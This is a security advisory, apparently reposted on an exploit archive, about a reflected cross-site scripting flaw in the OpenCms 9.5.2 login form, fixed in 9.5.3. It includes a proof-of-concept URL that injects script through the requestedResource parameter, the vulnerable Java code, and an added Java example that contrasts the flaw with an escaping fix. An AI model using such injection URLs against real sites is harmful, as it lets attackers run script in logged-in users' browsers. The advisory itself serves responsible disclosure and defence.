OpenCms 9.5.2 Cross Site Scripting

Posted Feb 23, 2016
Authored by Rainer Boie | Site syss.de

OpenCms version 9.5.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 90836f4c2cffaaf16a53502663f30a5c82ff5d7140b8933a573d1c03a30e34a1


Advisory ID: SYSS-2015-063
Product: OpenCms
Official Maintainer: Alkacon Software GmbH
Affected Version(s): 9.5.2
Tested Version(s): 9.5.2
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Maintainer Notification: 2015-11-27
Solution Date: 2016-01-13
Public Disclosure:
CVE Reference: Not yet assigned
Author of Advisory: Rainer Boie (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OpenCms is an open source web content management system. Alkacon
Software GmbH is the official maintainer and the major contributor for
OpenCms (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found that a logged-in user with at least workspace access is
exposed to a reflected cross-site scripting attack via the OpenCms login
form. Because the attack vector is triggered by an HTTP GET request, an
attacker can deliver it as a URL.

It is recommended to filter and escape transmitted parameter values.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

On a fresh installation of OpenCms version 9.5.2, after creating and
logging in as a user with workspace access rights, the following attack
vector was used:

http://<HOST>:<PORT>/opencms/opencms/system/login/index.html?requestedResource=%2Fsystem%2Fworkplace%2Fcommons%2Fdisplayresource.jsp%3Fresource%3D%252Fsuchergebnis%252Findex.html";alert('XSS');//&__loginform=true


The parameter is handled by the function appendWorkplaceOpenerScript in
the file CmsLogin.java.

The vulnerable code section is:

html.append("\tvar openUri = \"");
html.append(link(openResource));
html.append("\";\n");
html.append("\tvar workplaceWin = openWorkplace(openUri, \"");


The JavaScript code is executed in the web browser as it is included in
the following affected part of the HTML response:

function doOnload() {
    var openUri = "/opencms/opencms/system/workplace/commons/displayresource.jsp?resource=%2Fsuchergebnis%2Findex.html";alert('XSS');//";
    var workplaceWin = openWorkplace(openUri, "OpenCms1448623274999");
    if (window.name != "OpenCms1448623274999") {
        window.opener = workplaceWin;
        if (workplaceWin != null) {
            window.close();
        }
    }
}
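The root cause shown above is a request-controlled value concatenated into a JavaScript string literal without escaping for that context. The following is an added example, not OpenCms code: it reproduces the vulnerable append pattern next to a hardened variant that escapes the value for a double-quoted JavaScript literal. The OpenCms link() helper is omitted, and the method names and the tainted input are constructed for illustration.

```java
// Added example (not OpenCms code): the unescaped concatenation from
// appendWorkplaceOpenerScript beside a variant that escapes the value
// for a JavaScript string-literal context before embedding it.
public final class JsStringEscapeDemo {

    // Mirrors the vulnerable pattern: the value lands verbatim inside "...",
    // so a '"' in the input closes the literal and the rest runs as code.
    static String buildOpenerScriptVulnerable(String openUri) {
        StringBuilder html = new StringBuilder();
        html.append("\tvar openUri = \"");
        html.append(openUri);            // no escaping
        html.append("\";\n");
        return html.toString();
    }

    // Escape a value for use inside a double-quoted JavaScript string literal.
    // Backslash, both quote characters, '<', '>', '&' (so "</script>" cannot
    // end the script block) and line terminators become \\uXXXX sequences,
    // which the JavaScript parser decodes back into plain characters.
    static String escapeJsString(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c == '\\' || c == '"' || c == '\'' || c == '<' || c == '>'
                    || c == '&' || c == '\n' || c == '\r'
                    || c == '\u2028' || c == '\u2029') {
                out.append(String.format("\\u%04X", (int) c));
            } else {
                out.append(c);
            }
        }
        return out.toString();
    }

    static String buildOpenerScriptHardened(String openUri) {
        StringBuilder html = new StringBuilder();
        html.append("\tvar openUri = \"");
        html.append(escapeJsString(openUri));   // stays inside the literal
        html.append("\";\n");
        return html.toString();
    }

    public static void main(String[] args) {
        // Constructed input modelled on the advisory's PoC parameter value.
        String tainted = "/suchergebnis/index.html\";alert('XSS');//";
        System.out.print(buildOpenerScriptVulnerable(tainted));
        System.out.print(buildOpenerScriptHardened(tainted));
    }
}
```

In the hardened output the embedded `"` is emitted as `\u0022`, so the literal is never closed and `alert('XSS')` remains inert string data. Validating that `requestedResource` is a site-relative path before it reaches the script is the stronger complementary control.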


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The main maintainer Alkacon Software GmbH published version 9.5.3 on
01/13/2016, which fixes the flaw.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-11-27: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Response from maintainer: The issue is fixed in version
9.5.3 which is planned to be published 01/13/2016.

2016-01-13: Release 9.5.3 published

2016-01-20: Checked and confirmed fix of vulnerability in version 9.5.3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web site for OpenCms
http://www.opencms.org
[2] SySS Security Advisory SYSS-2015-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Credits:

This security vulnerability was found by Rainer Boie of the SySS GmbH.

E-Mail: rainer.boie (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc
Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
